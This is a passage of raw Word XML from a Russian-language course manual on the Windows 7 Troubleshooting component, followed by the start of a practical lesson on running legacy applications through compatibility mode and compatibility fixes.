                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1970575" cy="1490443"/>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10 – Работа пакета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обычно проверка не занимает много времени. Т.к. использованы параметры по умолчанию, проблема будет решена автоматически и выведен отчет об устраненной неполадке, рисунок 11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1968150" cy="1492277"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Рисунок 15" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId201"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1968486" cy="1492532"/>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11 – Отчет о работе пакета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если бы мы воспользовались ссылкой</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Дополнительно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сняли флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Автоматически применять исправления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - нам был бы предложен список возможных путей устранения этой неполадки. Установив флажки и щелкнув кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> мы бы применили предложенные исправления, рисунок 12.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2061750" cy="1529379"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Рисунок 16" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId203"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2061864" cy="1529463"/>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Рисунок12 – Применение исправлений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно запустить любой пакет, чтобы посмотреть, как он работает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все произведенные тесты сохраняются в журнале просмотреть который можно щелкнув ссылку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Просмотр журнала </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">в левой части окна компонента Устранения неполадок. Подробный отчет можно увидеть, дважды щелкнув по его названию в списке или нажав кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подробности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (одноименный пункт есть и в контекстном меню), рисунок 13.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1886585" cy="1346200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Рисунок 17" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId205"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1886585" cy="1346200"/>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13 – Просмотр отчета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если компоненту </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Устранения неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">удалось решить проблему, можно закрыть его. В противном случае воспользуйтесь ссылкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотреть дополнительные параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, на экране будет отображен запрос с несколькими вариантами поиска решения по устранению неполадки в Интернете, рисунок 14.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2117090" cy="1598295"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Рисунок 18" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId207"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId208" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2117090" cy="1598295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 14 – Поиск решения в Интернет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В левой части окна компонента</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Устранения неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> присутствует еще одна ссылка</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обратиться за помощью к другу</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если у вас есть друзья, которые хорошо разбираются в компьютерах, предоставьте другу доступ через Интернет к своему компьютеру с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удаленного помощника Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, чтобы друг помог решить проблему. При этом вы можете следить за его действиями и принимать участие в этом процессе. Так же можно использовать</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Средство записи действий по воспроизведению неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, которое может помочь в выявлении и устранении проблем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc26278726"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 7 </w:t>
      </w:r>
      <w:r w:rsidR="000C3230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C3230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сбоя программного обеспечения отраслевой направленности при установке приложений, написанных для более старых версий ОС Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidR="000C3230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="000C00A6" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="000C00A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: изуч</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> метод</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB1E1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>устранения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB1E1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00CB1E1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>боя программного обеспечения отраслевой направленности при установке приложений, написанных для более старых версий ОС Windows</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="000C00A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">формирование навыков установки и настройки программного обеспечения, написанного для более старых версий ОС Windows </w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidR="000C00A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, р</w:t>
      </w:r>
      <w:r w:rsidR="005137F6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ешение проблемы некорректной работы программного обеспечения отраслевой направленности: использование Microsoft Application Compatibility Toolkit для настройки параметров ранних версий приложений</w:t>
      </w:r>
      <w:r w:rsidR="000C00A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">персональный компьютер, </w:t>
      </w:r>
      <w:r w:rsidR="000C00A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">программное обеспечение, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Часто при установке новых версий ОС Microsoft Windows у обычных пользователей возникали проблемы с поддержкой старых приложений. ОС Microsoft Windows XP является исключением из правил. Теперь практически любое приложение может быть запущено в ОС Windows XP благодаря расширенной поддержке совместимости приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При переходе на новую операционную систему Вы можете быть обеспокоены тем, будут ли Ваши старые приложения нормально работать или хотя бы просто запускаться на новой платформе. Корпорация Microsoft понимала эту проблему и предприняла значительные шаги, позволяющие пользователям чувствовать себя уверенно при работе с ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows XP. Можно заставить старые приложения нормально работать в этой новой операционной системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как работает Исправление совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Корпорация Microsoft включила в ОС Windows XP поддержку совместимости приложений в виде исправлений совместимости. Эти исправления являются маленькой частью кода, с помощью которого осуществляется перехват программных действий, не поддерживаемых ОС Windows XP и перенаправление их к поддерживаемым методам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример: Определение версии ОС Windows. В том случае, если программа была написана специально для работы с определенной версией ОС Windows (отличной от Windows XP), то при запуске в ОС Windows XP, будет выдаваться ошибка о неверной версии ОС. Есть ряд исправлений совместимости, которые можно использовать в этом случае. Ваш выбор будет зависеть от того, для какой версии ОС Windows было разработано это приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После того, как Вы выберете подходящее исправление совместимости в соответствии с версией ОС Windows, требуемое программой, исправления совместимости в любое время будут перехватывать все запросы программы к ОС о ее версии и возвращать ту информацию о версии ОС, которую программа ожидает получить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение необходимых исправлений совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приложение, у которого существует одна или несколько проблем с совместимостью при работе в ОС Windows XP, часто выдает сообщение об ошибке, в котором указывается, в чем именно проблема. Однако возможна ситуация, когда приложение просто нельзя запустить или сразу после запуска оно некорректно завершает свою работу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В одних случаях сообщения об ошибках, которые выдает приложение, могут послужить ключом к решению возникших проблем для выявления необходимых исправлений совместимости. В других же, определение необходимых исправлений совместимости необходимо будет получить экспериментальным путем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование Режима совместимости в случае, если необходимо несколько исправлений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обычно для работы старых приложений требуется более чем одно исправление совместимости. Для таких случаев Microsoft сгруппировала часто используемые исправления совместимости в некотором режиме работы, называемом Режимом совместимости. Именно с этого режима Вам лучше всего начать, если Вы пытаетесь найти решения проблемы, связанной с совместимостью программ. Применить Режим совместимости можно, используя вкладку Совместимость (Compatibility) в окне Свойства (Properties) исполняемого файла программы так, как показано ниже на Рисунке 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
